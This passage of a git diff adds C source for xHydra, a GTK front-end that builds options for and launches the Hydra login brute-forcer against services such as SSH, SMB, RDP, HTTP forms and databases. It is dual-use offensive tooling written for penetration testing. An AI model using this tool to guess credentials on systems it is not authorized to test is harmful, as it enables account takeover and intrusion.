lookup_widget(GTK_WIDGET(wndMain), "entPassFile"); + options[i++] = (char *) gtk_entry_get_text((GtkEntry *) widget); + } + } + + /* empty passes / login as pass? */ + memset(passLoginNull, 0, 4); + widget = lookup_widget(GTK_WIDGET(wndMain), "chkPassNull"); + if (gtk_toggle_button_get_active((GtkToggleButton *) widget)) { + passLoginNull[0] = 'n'; + } + widget = lookup_widget(GTK_WIDGET(wndMain), "chkPassLogin"); + if (gtk_toggle_button_get_active((GtkToggleButton *) widget)) { + if (passLoginNull[0] == 0) { + passLoginNull[0] = 's'; + } else { + passLoginNull[1] = 's'; + } + } + if (passLoginNull[0] != 0) { + options[i++] = "-e"; + options[i++] = passLoginNull; + } + + /* #of tasks */ + widget = lookup_widget(GTK_WIDGET(wndMain), "spnTasks"); + j = gtk_spin_button_get_value_as_int((GtkSpinButton *) widget); + if (j != 40) { + snprintf(tasks, 10, "%d", j); + options[i++] = "-t"; + options[i++] = tasks; + } + + /* timeout */ + widget = lookup_widget(GTK_WIDGET(wndMain), "spnTimeout"); + j = gtk_spin_button_get_value_as_int((GtkSpinButton *) widget); + if (j != 30) { + snprintf(timeout, 10, "%d", j); + options[i++] = "-w"; + options[i++] = timeout; + } + + /* loop around users? */ + widget = lookup_widget(GTK_WIDGET(wndMain), "chkUsernameLoop"); + if (gtk_toggle_button_get_active((GtkToggleButton *) widget)) { + options[i++] = "-u"; + } + + /* exit after first found pair? */ + widget = lookup_widget(GTK_WIDGET(wndMain), "chkExitf"); + if (gtk_toggle_button_get_active((GtkToggleButton *) widget)) { + options[i++] = "-f"; + } + + /* get additional parameters */ + widget = lookup_widget(GTK_WIDGET(wndMain), "entProtocol"); + tmp = (char *) gtk_entry_get_text((GtkEntry *) widget); + + if (!strncmp(tmp, "http-proxy", 10)) { + widget = lookup_widget(GTK_WIDGET(wndMain), "entHTTPProxyURL"); + options[i++] = "-m"; + options[i++] = (char *) gtk_entry_get_text((GtkEntry *) widget); + + } else if (!strncmp(tmp, "http-", 5) || !strncmp(tmp, "https-", 6)) { + options[i++] = "-m"; + widget = lookup_widget(GTK_WIDGET(wndMain), "entHTTPURL"); + options[i++] = (char *) gtk_entry_get_text((GtkEntry *) widget); + + } else if (!strcmp(tmp, "cisco-enable")) { + options[i++] = "-m"; + widget = lookup_widget(GTK_WIDGET(wndMain), "entCiscoPass"); + options[i++] = (char *) gtk_entry_get_text((GtkEntry *) widget); + + } else if (!strcmp(tmp, "ldap3-crammd5")) { + options[i++] = "-m"; + widget = lookup_widget(GTK_WIDGET(wndMain), "entLDAPDN"); + options[i++] = (char *) gtk_entry_get_text((GtkEntry *) widget); + + } else if (!strcmp(tmp, "ldap3-digestmd5")) { + options[i++] = "-m"; + widget = lookup_widget(GTK_WIDGET(wndMain), "entLDAPDN"); + options[i++] = (char *) gtk_entry_get_text((GtkEntry *) widget); + + } else if (!strcmp(tmp, "smb")) { + memset(smbparm, 0, 12); + + widget = lookup_widget(GTK_WIDGET(wndMain), "chkDomain"); + widget2 = lookup_widget(GTK_WIDGET(wndMain), "chkLocal"); + options[i++] = "-m"; + strncpy(smbparm, "Both", sizeof(smbparm)); + smbparm[strlen("Both")] = '\0'; + + if (gtk_toggle_button_get_active((GtkToggleButton *) widget)) { + strncpy(smbparm, "Domain", sizeof(smbparm)); + smbparm[strlen("Domain")] = '\0'; + } + if (gtk_toggle_button_get_active((GtkToggleButton *) widget2)) { + if (gtk_toggle_button_get_active((GtkToggleButton *) widget)) { + strncpy(smbparm, "Both", sizeof(smbparm)); + smbparm[strlen("Both")] = '\0'; + } else { + strncpy(smbparm, "Local", sizeof(smbparm)); + smbparm[strlen("Local")] = '\0'; + } + } + widget = lookup_widget(GTK_WIDGET(wndMain), "chkNTLM"); + if (gtk_toggle_button_get_active((GtkToggleButton *) widget)) { + strcat(smbparm, "Hash"); + } + options[i++] = smbparm; + + } else if (!strcmp(tmp, "sapr3")) { + widget = lookup_widget(GTK_WIDGET(wndMain), "spnSAPR3"); + j = gtk_spin_button_get_value_as_int((GtkSpinButton *) widget); + snprintf(sapr3id, sizeof(sapr3id), "%d", j); + options[i++] = "-m"; + options[i++] = sapr3id; + + } else if (!strcmp(tmp, "cvs") || !strcmp(tmp, "svn")) { + widget = lookup_widget(GTK_WIDGET(wndMain), "entCVS"); + options[i++] = "-m"; + options[i++] = (char *) gtk_entry_get_text((GtkEntry *) widget); + + } else if (!strcmp(tmp, "snmp")) { + memset(snmpparm, 0, 4); + widget = lookup_widget(GTK_WIDGET(wndMain), "radioSNMPVer1"); + if (gtk_toggle_button_get_active((GtkToggleButton *) widget)) { + snmpparm[0] = '1'; + } else { + snmpparm[0] = '2'; + } + + widget = lookup_widget(GTK_WIDGET(wndMain), "radioSNMPWrite"); + if (gtk_toggle_button_get_active((GtkToggleButton *) widget)) { + snmpparm[0] = 'w'; + } else { + snmpparm[0] = 'r'; + } + + options[i++] = "-m"; + options[i++] = snmpparm; + } else if (!strcmp(tmp, "telnet")) { + widget = lookup_widget(GTK_WIDGET(wndMain), "entTelnet"); + if ((char *) gtk_entry_get_text((GtkEntry *) widget) != NULL) { + options[i++] = "-m"; + options[i++] = (char *) gtk_entry_get_text((GtkEntry *) widget); + } + } + + /* clean up proxy settings */ + unsetenv("HYDRA_PROXY_HTTP"); + unsetenv("HYDRA_PROXY_CONNECT"); + unsetenv("HYDRA_PROXY_AUTH"); + + /* proxy support */ + widget = lookup_widget(GTK_WIDGET(wndMain), "radioProxy"); + + if (!gtk_toggle_button_get_active((GtkToggleButton *) widget)) { + + widget2 = lookup_widget(GTK_WIDGET(wndMain), "entHTTPProxy"); + widget = lookup_widget(GTK_WIDGET(wndMain), "radioProxy2"); + + /* which variable do we set? */ + if ((!strncmp(tmp, "http-", 5)) && (gtk_toggle_button_get_active((GtkToggleButton *) widget))) { + setenv("HYDRA_PROXY_HTTP", gtk_entry_get_text((GtkEntry *) widget2), 1); + } else { + setenv("HYDRA_PROXY_CONNECT", (char *) gtk_entry_get_text((GtkEntry *) widget2), 1); + } + + /* do we need to provide user and pass? */ + widget = lookup_widget(GTK_WIDGET(wndMain), "chkProxyAuth"); + if (gtk_toggle_button_get_active((GtkToggleButton *) widget)) { + widget = lookup_widget(GTK_WIDGET(wndMain), "entProxyUser"); + widget2 = lookup_widget(GTK_WIDGET(wndMain), "entProxyPass"); + a = g_string_new((gchar *) gtk_entry_get_text((GtkEntry *) widget)); + a = g_string_append_c(a, ':'); + a = g_string_append(a, gtk_entry_get_text((GtkEntry *) widget2)); + setenv("HYDRA_PROXY_AUTH", a->str, 1); + (void) g_string_free(a, TRUE); + } + } + + /* get the target, or target list */ + widget = lookup_widget(GTK_WIDGET(wndMain), "radioTarget1"); + if (gtk_toggle_button_get_active((GtkToggleButton *) widget)) { + widget = lookup_widget(GTK_WIDGET(wndMain), "entTarget"); + options[i++] = (char *) gtk_entry_get_text((GtkEntry *) widget); + } else { + options[i++] = "-M"; + widget = lookup_widget(GTK_WIDGET(wndMain), "entTargetFile"); + options[i++] = (char *) gtk_entry_get_text((GtkEntry *) widget); + } + + /* get the service */ + widget = lookup_widget(GTK_WIDGET(wndMain), "entProtocol"); + options[i++] = (char *) gtk_entry_get_text((GtkEntry *) widget); + + options[i] = NULL; + return i; +} + +int update_statusbar() { + int i, j; + char *options[128]; + guint context_id; + GtkStatusbar *statusbar; + extern guint message_id; + GString *statustext = g_string_new("hydra "); + + i = hydra_get_options(options); + + for (j = 1; j < i; j++) { + + statustext = g_string_append(statustext, options[j]); + statustext = g_string_append_c(statustext, ' '); + } + + statusbar = (GtkStatusbar *) lookup_widget(GTK_WIDGET(wndMain), "statusbar"); + context_id = gtk_statusbar_get_context_id(statusbar, "status"); + + /* an old message in stack? */ + if (message_id != 0) { + gtk_statusbar_remove(statusbar, context_id, message_id); + } + + message_id = gtk_statusbar_push(statusbar, context_id, (gchar *) statustext->str); + + (void) g_string_free(statustext, TRUE); + + return TRUE; +} + +int read_into(int fd) { + char in_buf[BUF_S]; + char *passline; + char *start, *end; + int result; + GtkWidget *output; + GtkTextBuffer *outputbuf; + GtkTextIter outputiter; + + if ((result = read(fd, in_buf, BUF_S - 1)) < 0) { + g_warning("%s::%i: read returned negative!", __FILE__, __LINE__); + return FALSE; + } else if (result == 0) { + return FALSE; + } else { + in_buf[result] = 0; + } + + output = lookup_widget(GTK_WIDGET(wndMain), "txtOutput"); + outputbuf = gtk_text_view_get_buffer((GtkTextView *) output); + + gtk_text_buffer_get_iter_at_offset(outputbuf, &outputiter, -1); + + + if ((passline = strstr(in_buf, "password: ")) == NULL) { + gtk_text_buffer_insert(outputbuf, &outputiter, in_buf, result); + } else { + start = in_buf; + end = in_buf; + while ((end = (strchr(end + 1, '\n'))) < passline) { + start = end; + } + + if (start != in_buf) { + gtk_text_buffer_insert(outputbuf, &outputiter, in_buf, (start - in_buf + 1)); + } + gtk_text_buffer_insert_with_tags_by_name(outputbuf, &outputiter, start, (end - start + 1), "bold", NULL); + + if (end - in_buf - result > 0) { + gtk_text_buffer_insert(outputbuf, &outputiter, end + 1, -1); + } + + } + + + if (strstr(in_buf, " finished at ") != NULL) { + gtk_text_buffer_insert_with_tags_by_name(outputbuf, &outputiter, "\n\n", -1, "bold", NULL); + } + + if (result == BUF_S - 1) /* there might be more available, recurse baby! */ + return read_into(fd); + else + return TRUE; +} + +/* wait for hydra output */ + +static int wait_hydra_output(gpointer data) { + static int stdout_ok = TRUE, stderr_ok = TRUE; + fd_set rset; + struct timeval tv; + int result, max; + int *fd = data; + int status; + + g_assert((stdout_ok == TRUE) || (stderr_ok == TRUE)); + + tv.tv_sec = 0; + tv.tv_usec = 0; + + FD_ZERO(&rset); + max = -1; + + if (stdout_ok) { + FD_SET(fd[0], &rset); + max = fd[0]; + } + if (stderr_ok) { + FD_SET(fd[1], &rset); + if (-1 == max) + max = fd[1]; + else + max = fd[0] > fd[1] ? fd[0] : fd[1]; + } + + result = select(max + 1, &rset, NULL, NULL, &tv); + + if (result < 0) + g_error("wait_hydra_output: select returned negative!"); + else if (result == 0) + return TRUE; + + if (stdout_ok && FD_ISSET(fd[0], &rset)) + stdout_ok = read_into(fd[0]); + if (stderr_ok && FD_ISSET(fd[1], &rset)) + stderr_ok = read_into(fd[1]); + + if (!(stdout_ok || stderr_ok)) { + waitpid(hydra_pid, &status, 0); + hydra_pid = 0; + stdout_ok = stderr_ok = TRUE; + return FALSE; + } else + return TRUE; +} + + +/* assumes a successfull pipe() won't set the fd's to -1 */ +static void close_pipe(int *pipe) { + if (-1 != pipe[0]) { + close(pipe[0]); + pipe[0] = -1; + } + if (-1 != pipe[1]) { + close(pipe[1]); + pipe[1] = -1; + } +} + +/* executes the command stored in command->elemets (which is suitable for execv()) + * returns an int *pfd with file descriptors: + * pfd[0] STDOUT output of the command and + * pfd[1] STDERR output of the command + */ + +int *popen_re_unbuffered(char *command) { + static int p_r[2] = { -1, -1 }, p_e[2] = { + -1, -1}; + static int *pfd = NULL; + + char *options[128]; + hydra_pid = 0; + + update_statusbar(); + + /* only allocate once */ + if (NULL == pfd) + pfd = malloc(sizeof(int) * 2); + + /* clean up from last command */ + close_pipe(p_r); + close_pipe(p_e); + + if (pipe(p_r) < 0 || pipe(p_e) < 0) { + g_warning("popen_rw_unbuffered: Error creating pipe!"); + return NULL; + } + + if ((hydra_pid = fork()) < 0) { + g_warning("popen_rw_unbuffered: Error forking!"); + return NULL; + } else if (hydra_pid == 0) { /* child */ + int k; + if (setpgid(getpid(), getpid()) < 0) + g_warning("popen_rw_unbuffered: setpgid() failed"); + if (close(p_r[0]) < 0) + g_warning("popen_rw_unbuffered: close(p_r[0]) failed"); + if (p_r[1] != STDOUT_FILENO) + if (dup2(p_r[1], STDOUT_FILENO) < 0) + g_warning("popen_rw_unbuffered: child dup2 STDOUT failed!"); + if (close(p_r[1]) < 0) + g_warning("popen_rw_unbuffered: close(p_r[1]) failed"); + + if (close(p_e[0]) < 0) + g_warning("popen_rw_unbuffered: close(p_e[0]) failed"); + if (p_e[1] != STDERR_FILENO) + if (dup2(p_e[1], STDERR_FILENO) < 0) + g_warning("popen_rw_unbuffered: child dup2 STDERR failed!"); + if (close(p_e[1]) < 0) + g_warning("popen_rw_unbuffered: close(p_e[1]) failed"); + + (void) hydra_get_options(options); + + execv(HYDRA_BIN, options); + + g_warning("%s %i: popen_rw_unbuffered: execv() returned", __FILE__, __LINE__); + + for (k = 0; options[k] != NULL; k++) { + g_warning("%s", options[k]); + } + gtk_main_quit(); + } else { /* parent */ + if (close(p_r[1]) < 0) + g_warning("popen_rw_unbuffered: close(p_r[1]) (parent) failed"); + if (close(p_e[1]) < 0) + g_warning("popen_rw_unbuffered: close(p_e[1]) (parent) failed"); + pfd[0] = p_r[0]; + pfd[1] = p_e[0]; + return pfd; + } + g_assert_not_reached(); + return pfd; +} + +void on_quit1_activate(GtkMenuItem * menuitem, gpointer user_data) { + gtk_main_quit(); +} + + +void on_about1_activate(GtkMenuItem * menuitem, gpointer user_data) { + +} + +void on_btnStart_clicked(GtkButton * button, gpointer user_data) { + int *fd = NULL; + + fd = popen_re_unbuffered(NULL); + g_timeout_add(200, wait_hydra_output, fd); + +} + +void on_btnStop_clicked(GtkButton * button, gpointer user_data) { + if (hydra_pid != 0) { + kill(hydra_pid, SIGTERM); + hydra_pid = 0; + } +} + + +void on_wndMain_destroy(GtkObject * object, gpointer user_data) { + if (hydra_pid != 0) { + kill(hydra_pid, SIGTERM); + hydra_pid = 0; + } + gtk_main_quit(); +} + + + +gboolean on_entTargetFile_button_press_event(GtkWidget * widget, GdkEventButton * event, gpointer user_data) { + hydra_select_file((GtkEntry *) widget, "Select target list"); + gtk_widget_grab_focus(widget); + return TRUE; +} + + +gboolean on_entUsernameFile_button_press_event(GtkWidget * widget, GdkEventButton * event, gpointer user_data) { + hydra_select_file((GtkEntry *) widget, "Select username list"); + gtk_widget_grab_focus(widget); + return TRUE; +} + + +gboolean on_entPassFile_button_press_event(GtkWidget * widget, GdkEventButton * event, gpointer user_data) { + hydra_select_file((GtkEntry *) widget, "Select password list"); + gtk_widget_grab_focus(widget); + return TRUE; +} + +gboolean on_entColonFile_button_press_event(GtkWidget * widget, GdkEventButton * event, gpointer user_data) { + hydra_select_file((GtkEntry *) widget, "Select colon separated user,password list"); + gtk_widget_grab_focus(widget); + return TRUE; +} + +void on_btnSave_clicked(GtkButton * button, gpointer user_data) { +#ifdef GTK_TYPE_FILE_CHOOSER + GtkWidget *dialog; + char *filename; + gchar *text; + int fd; + GtkWidget *output; + GtkTextBuffer *outputbuf; + GtkTextIter start; + GtkTextIter end; + + dialog = gtk_file_chooser_dialog_new("Save output", (GtkWindow *) wndMain, GTK_FILE_CHOOSER_ACTION_SAVE, + GTK_STOCK_SAVE, GTK_RESPONSE_ACCEPT, GTK_STOCK_CANCEL, GTK_RESPONSE_CANCEL, NULL); + if (gtk_dialog_run(GTK_DIALOG(dialog)) == GTK_RESPONSE_ACCEPT) { + filename = gtk_file_chooser_get_filename(GTK_FILE_CHOOSER(dialog)); + + output = lookup_widget(GTK_WIDGET(wndMain), "txtOutput"); + outputbuf = gtk_text_view_get_buffer((GtkTextView *) output); + gtk_text_buffer_get_start_iter(outputbuf, &start); + gtk_text_buffer_get_end_iter(outputbuf, &end); + + text = gtk_text_buffer_get_text(outputbuf, &start, &end, TRUE); + + fd = open(filename, O_CREAT | O_TRUNC | O_WRONLY, 0644); + if (fd > 0) { + write(fd, text, strlen(text)); + close(fd); + } + g_free(text); + g_free(filename); + } + gtk_widget_destroy(dialog); +#endif +} + +void on_chkColon_toggled(GtkToggleButton * togglebutton, gpointer user_data) { + GtkWidget *user, *pass; + user = lookup_widget(GTK_WIDGET(wndMain), "frmUsername");; + pass = lookup_widget(GTK_WIDGET(wndMain), "frmPass"); + + if (gtk_toggle_button_get_active(togglebutton)) { + gtk_widget_set_sensitive(user, FALSE); + gtk_widget_set_sensitive(pass, FALSE); + } else { + gtk_widget_set_sensitive(user, TRUE); + gtk_widget_set_sensitive(pass, TRUE); + } +} + +void on_btnClear_clicked(GtkButton * button, gpointer user_data) { + GtkWidget *output; + GtkTextBuffer *outputbuf; + + output = lookup_widget(GTK_WIDGET(wndMain), "txtOutput"); + outputbuf = gtk_text_view_get_buffer((GtkTextView *) output); + gtk_text_buffer_set_text(outputbuf, "", -1); +} diff --git a/hydra-gtk/src/callbacks.h b/hydra-gtk/src/callbacks.h new file mode 100755 index 0000000..a37db9e --- /dev/null +++ b/hydra-gtk/src/callbacks.h @@ -0,0 +1,27 @@ +#include + +int update_statusbar(); + +void on_quit1_activate(GtkMenuItem * menuitem, gpointer user_data); + +void on_about1_activate(GtkMenuItem * menuitem, gpointer user_data); + +void on_btnStart_clicked(GtkButton * button, gpointer user_data); + +void on_wndMain_destroy(GtkObject * object, gpointer user_data); + +void on_btnStop_clicked(GtkButton * button, gpointer user_data); + +gboolean on_entTargetFile_button_press_event(GtkWidget * widget, GdkEventButton * event, gpointer user_data); + +gboolean on_entUsernameFile_button_press_event(GtkWidget * widget, GdkEventButton * event, gpointer user_data); + +gboolean on_entPassFile_button_press_event(GtkWidget * widget, GdkEventButton * event, gpointer user_data); + +void on_btnSave_clicked(GtkButton * button, gpointer user_data); + +gboolean on_entColonFile_button_press_event(GtkWidget * widget, GdkEventButton * event, gpointer user_data); + +void on_chkColon_toggled(GtkToggleButton * togglebutton, gpointer user_data); + +void on_btnClear_clicked(GtkButton * button, gpointer user_data); diff --git a/hydra-gtk/src/interface.c b/hydra-gtk/src/interface.c new file mode 100755 index 0000000..912ffaa --- /dev/null +++ b/hydra-gtk/src/interface.c @@ -0,0 +1,1110 @@ + +/* + * DO NOT EDIT THIS FILE - it is generated by Glade. + */ + +#ifdef HAVE_CONFIG_H +#include +#endif + +#include +#include +#include +#include +#include + +#include +#include + +#include "callbacks.h" +#include "interface.h" +#include "support.h" + +#define GLADE_HOOKUP_OBJECT(component,widget,name) \ + g_object_set_data_full (G_OBJECT (component), name, \ + gtk_widget_ref (widget), (GDestroyNotify) gtk_widget_unref) + +#define GLADE_HOOKUP_OBJECT_NO_REF(component,widget,name) \ + g_object_set_data (G_OBJECT (component), name, widget) + +GtkWidget *create_wndMain(void) { + GtkWidget *wndMain; + GtkWidget *vbox1; + GtkWidget *menubar1; + GtkWidget *quit1; + GtkWidget *ntbMain; + GtkWidget *vbox5; + GtkWidget *frame11; + GtkWidget *table8; + GtkWidget *cmbProtocol; + GList *cmbProtocol_items = NULL; + GtkWidget *entProtocol; + GtkWidget *label7; + GtkObject *spnPort_adj; + GtkWidget *spnPort; + GtkWidget *label6; + GtkWidget *radioTarget2; + GSList *radioTarget2_group = NULL; + GtkWidget *entTargetFile; + GtkWidget *entTarget; + GtkWidget *radioTarget1; + GtkWidget *label28; + GtkWidget *frame12; + GtkWidget *table9; + GtkWidget *chkVerbose; + GtkWidget *chkDebug; + GtkWidget *chkAttempts; + GtkWidget *chkIPV6; + GtkWidget *chkSSL; + GtkWidget *label29; + GtkWidget *label1; + GtkWidget *vbox2; + GtkWidget *frmUsername; + GtkWidget *table2; + GtkWidget *entUsernameFile; + GtkWidget *entUsername; + GtkWidget *chkUsernameLoop; + GtkWidget *radioUsername1; + GSList *radioUsername1_group = NULL; + GtkWidget *radioUsername2; + GtkWidget *label8; + GtkWidget *frmPass; + GtkWidget *table3; + GtkWidget *entPassFile; + GtkWidget *entPass; + GtkWidget *radioPass1; + GSList *radioPass1_group = NULL; + GtkWidget *radioPass2; + GtkWidget *labelpass; + GtkWidget *frame8; + GtkWidget *table5; + GtkWidget *chkColon; + GtkWidget *entColonFile; + GtkWidget *label20; + GtkWidget *table6; + GtkWidget *chkPassLogin; + GtkWidget *chkPassNull; + GtkWidget *label2; + GtkWidget *table4; + GtkWidget *frame9; + GtkWidget *table7; + GtkWidget *label22; + GtkWidget *entHTTPProxy; + GtkWidget *chkProxyAuth; + GtkWidget *label23; + GtkWidget *entProxyUser; + GtkWidget *label24; + GtkWidget *entProxyPass; + GtkWidget *label26; + GtkWidget *hbox3; + GtkWidget *radioProxy; + GSList *radioProxy_group = NULL; + GtkWidget *radioProxy2; + GtkWidget *radioProxy3; + GtkWidget *label21; + GtkWidget *frame13; + GtkWidget *table10; + GtkWidget *chkExitf; + GtkObject *spnTimeout_adj; + GtkWidget *spnTimeout; + GtkObject *spnTasks_adj; + GtkWidget *spnTasks; + GtkWidget *label32; + GtkWidget *label31; + GtkWidget *label30; + GtkWidget *label3; + GtkWidget *vbox4; + GtkWidget *frame10; + GtkWidget *entHTTPProxyURL; + GtkWidget *label27; + GtkWidget *frame3; + GtkWidget *entHTTPURL; + GtkWidget *label15; + GtkWidget *frame4; + GtkWidget *entCiscoPass; + GtkWidget *label16; + GtkWidget *frame5; + GtkWidget *entLDAPDN; + GtkWidget *label17; + GtkWidget *frame6; + GtkWidget *hbox2; + GtkWidget *chkLocal; + GtkWidget *chkDomain; + GtkWidget *chkNTLM; + GtkWidget *label18; + GtkWidget *frame7; + GtkObject *spnSAPR3_adj; + GtkWidget *spnSAPR3; + GtkWidget *label19; + GtkWidget *frame15; + GtkWidget *entCVS; + GtkWidget *label34; + GtkWidget *frame17; + GtkWidget *alignment1; + GtkWidget *entTelnet; + GtkWidget *label36; + GtkWidget *frame16; + GtkWidget *table11; + GtkWidget *radioSNMPRead; + GSList *radioSNMPRead_group = NULL; + GtkWidget *radioSNMPWrite; + GtkWidget *radioSNMPVer2; + GSList *radioSNMPVer2_group = NULL; + GtkWidget *radioSNMPVer1; + GtkWidget *label35; + GtkWidget *label14; + GtkWidget *vbox3; + GtkWidget *scrolledwindow1; + GtkWidget *viewport1; + GtkWidget *frame14; + GtkWidget *txtOutput; + GtkWidget *label33; + GtkWidget *hbox1; + GtkWidget *btnStart; + GtkWidget *btnStop; + GtkWidget *btnSave; + GtkWidget *btnClear; + GtkWidget *label4; + GtkWidget *statusbar; + GtkAccelGroup *accel_group; + GtkTooltips *tooltips; + + tooltips = gtk_tooltips_new(); + + accel_group = gtk_accel_group_new(); + + wndMain = gtk_window_new(GTK_WINDOW_TOPLEVEL); + gtk_widget_set_name(wndMain, "wndMain"); + gtk_window_set_title(GTK_WINDOW(wndMain), "xHydra"); + + vbox1 = gtk_vbox_new(FALSE, 0); + gtk_widget_set_name(vbox1, "vbox1"); + gtk_widget_show(vbox1); + gtk_container_add(GTK_CONTAINER(wndMain), vbox1); + + menubar1 = gtk_menu_bar_new(); + gtk_widget_set_name(menubar1, "menubar1"); + gtk_widget_show(menubar1); + gtk_box_pack_start(GTK_BOX(vbox1), menubar1, FALSE, FALSE, 0); + + quit1 = gtk_image_menu_item_new_from_stock("gtk-quit", accel_group); + gtk_widget_set_name(quit1, "quit1"); + gtk_widget_show(quit1); + gtk_container_add(GTK_CONTAINER(menubar1), quit1); + + ntbMain = gtk_notebook_new(); + gtk_widget_set_name(ntbMain, "ntbMain"); + gtk_widget_show(ntbMain); + gtk_box_pack_start(GTK_BOX(vbox1), ntbMain, TRUE, TRUE, 0); + + vbox5 = gtk_vbox_new(FALSE, 0); + gtk_widget_set_name(vbox5, "vbox5"); + gtk_widget_show(vbox5); + gtk_container_add(GTK_CONTAINER(ntbMain), vbox5); + + frame11 = gtk_frame_new(NULL); + gtk_widget_set_name(frame11, "frame11"); + gtk_widget_show(frame11); + gtk_box_pack_start(GTK_BOX(vbox5), frame11, TRUE, TRUE, 0); + + table8 = gtk_table_new(5, 2, FALSE); + gtk_widget_set_name(table8, "table8"); + gtk_widget_show(table8); + gtk_container_add(GTK_CONTAINER(frame11), table8); + + cmbProtocol = gtk_combo_new(); + g_object_set_data(G_OBJECT(GTK_COMBO(cmbProtocol)->popwin), "GladeParentKey", cmbProtocol); + gtk_widget_set_name(cmbProtocol, "cmbProtocol"); + gtk_widget_show(cmbProtocol); + gtk_table_attach(GTK_TABLE(table8), cmbProtocol, 1, 2, 4, 5, (GtkAttachOptions) (GTK_EXPAND | GTK_SHRINK), (GtkAttachOptions) (GTK_EXPAND), 0, 0); + cmbProtocol_items = g_list_append(cmbProtocol_items, (gpointer) "afp"); + cmbProtocol_items = g_list_append(cmbProtocol_items, (gpointer) "asterisk"); + cmbProtocol_items = g_list_append(cmbProtocol_items, (gpointer) "cisco"); + cmbProtocol_items = g_list_append(cmbProtocol_items, (gpointer) "cisco-enable"); + cmbProtocol_items = g_list_append(cmbProtocol_items, (gpointer) "cvs"); + cmbProtocol_items = g_list_append(cmbProtocol_items, (gpointer) "firebird"); + cmbProtocol_items = g_list_append(cmbProtocol_items, (gpointer) "ftp"); + cmbProtocol_items = g_list_append(cmbProtocol_items, (gpointer) "ftps"); + cmbProtocol_items = g_list_append(cmbProtocol_items, (gpointer) "http-head"); + cmbProtocol_items = g_list_append(cmbProtocol_items, (gpointer) "http-get"); + cmbProtocol_items = g_list_append(cmbProtocol_items, (gpointer) "http-get-form"); + cmbProtocol_items = g_list_append(cmbProtocol_items, (gpointer) "http-post-form"); + cmbProtocol_items = g_list_append(cmbProtocol_items, (gpointer) "http-proxy"); + cmbProtocol_items = g_list_append(cmbProtocol_items, (gpointer) "http-proxy-urlenum"); + cmbProtocol_items = g_list_append(cmbProtocol_items, (gpointer) "https-head"); + cmbProtocol_items = g_list_append(cmbProtocol_items, (gpointer) "https-get"); + cmbProtocol_items = g_list_append(cmbProtocol_items, (gpointer) "https-get-form"); + cmbProtocol_items = g_list_append(cmbProtocol_items, (gpointer) "https-post-form"); + cmbProtocol_items = g_list_append(cmbProtocol_items, (gpointer) "icq"); + cmbProtocol_items = g_list_append(cmbProtocol_items, (gpointer) "irc"); + cmbProtocol_items = g_list_append(cmbProtocol_items, (gpointer) "imap"); + cmbProtocol_items = g_list_append(cmbProtocol_items, (gpointer) "ldap2"); + cmbProtocol_items = g_list_append(cmbProtocol_items, (gpointer) "ldap3"); + cmbProtocol_items = g_list_append(cmbProtocol_items, (gpointer) "ldap3-crammd5"); + cmbProtocol_items = g_list_append(cmbProtocol_items, (gpointer) "ldap3-digestmd5"); + cmbProtocol_items = g_list_append(cmbProtocol_items, (gpointer) "mssql"); + cmbProtocol_items = g_list_append(cmbProtocol_items, (gpointer) "mysql"); + cmbProtocol_items = g_list_append(cmbProtocol_items, (gpointer) "ncp"); + cmbProtocol_items = g_list_append(cmbProtocol_items, (gpointer) "nntp"); + cmbProtocol_items = g_list_append(cmbProtocol_items, (gpointer) "oracle"); + cmbProtocol_items = g_list_append(cmbProtocol_items, (gpointer) "oracle-listener"); + cmbProtocol_items = g_list_append(cmbProtocol_items, (gpointer) "oracle-sid"); + cmbProtocol_items = g_list_append(cmbProtocol_items, (gpointer) "pcnfs"); + cmbProtocol_items = g_list_append(cmbProtocol_items, (gpointer) "pop3"); + cmbProtocol_items = g_list_append(cmbProtocol_items, (gpointer) "pcanywhere"); + cmbProtocol_items = g_list_append(cmbProtocol_items, (gpointer) "postgres"); + cmbProtocol_items = g_list_append(cmbProtocol_items, (gpointer) "rdp"); + cmbProtocol_items = g_list_append(cmbProtocol_items, (gpointer) "rexec"); + cmbProtocol_items = g_list_append(cmbProtocol_items, (gpointer) "rlogin"); + cmbProtocol_items = g_list_append(cmbProtocol_items, (gpointer) "rsh"); + cmbProtocol_items = g_list_append(cmbProtocol_items, (gpointer) "s7-300"); + cmbProtocol_items = g_list_append(cmbProtocol_items, (gpointer) "sapr3"); + cmbProtocol_items = g_list_append(cmbProtocol_items, (gpointer) "sip"); + cmbProtocol_items = g_list_append(cmbProtocol_items, (gpointer) "smb"); + cmbProtocol_items = g_list_append(cmbProtocol_items, (gpointer) "smtp"); + cmbProtocol_items = g_list_append(cmbProtocol_items, (gpointer) "snmp"); + cmbProtocol_items = g_list_append(cmbProtocol_items, (gpointer) "socks5"); + cmbProtocol_items = g_list_append(cmbProtocol_items, (gpointer) "ssh"); + cmbProtocol_items = g_list_append(cmbProtocol_items, (gpointer) "sshkey"); + cmbProtocol_items = g_list_append(cmbProtocol_items, (gpointer) "svn"); + cmbProtocol_items = g_list_append(cmbProtocol_items, (gpointer) "teamspeak"); + cmbProtocol_items = g_list_append(cmbProtocol_items, (gpointer) "telnet"); + cmbProtocol_items = g_list_append(cmbProtocol_items, (gpointer) "vnc"); + cmbProtocol_items = g_list_append(cmbProtocol_items, (gpointer) "vmauthd"); + cmbProtocol_items = g_list_append(cmbProtocol_items, (gpointer) "xmpp"); + gtk_combo_set_popdown_strings(GTK_COMBO(cmbProtocol), cmbProtocol_items); + g_list_free(cmbProtocol_items); + + entProtocol = GTK_COMBO(cmbProtocol)->entry; + gtk_widget_set_name(entProtocol, "entProtocol"); + gtk_widget_show(entProtocol); + gtk_tooltips_set_tip(tooltips, entProtocol, "The protocol to use for the login/password cracking attempt", NULL); + + label7 = gtk_label_new("Protocol"); + gtk_widget_set_name(label7, "label7"); + gtk_widget_show(label7); + gtk_table_attach(GTK_TABLE(table8), label7, 0, 1, 4, 5, (GtkAttachOptions) (GTK_EXPAND | GTK_SHRINK), (GtkAttachOptions) (GTK_EXPAND), 0, 0); + gtk_misc_set_alignment(GTK_MISC(label7), 0, 0.5); + + spnPort_adj = gtk_adjustment_new(0, 0, 65535, 1, 10, 0); + spnPort = gtk_spin_button_new(GTK_ADJUSTMENT(spnPort_adj), 1, 0); + gtk_widget_set_name(spnPort, "spnPort"); + gtk_widget_show(spnPort); + gtk_table_attach(GTK_TABLE(table8), spnPort, 1, 2, 3, 4, (GtkAttachOptions) (GTK_EXPAND | GTK_SHRINK), (GtkAttachOptions) (GTK_EXPAND), 0, 0); + gtk_tooltips_set_tip(tooltips, spnPort, "select the port on which the daemon you want to brute force runs, 0 means default", NULL); + + label6 = gtk_label_new("Port"); + gtk_widget_set_name(label6, "label6"); + 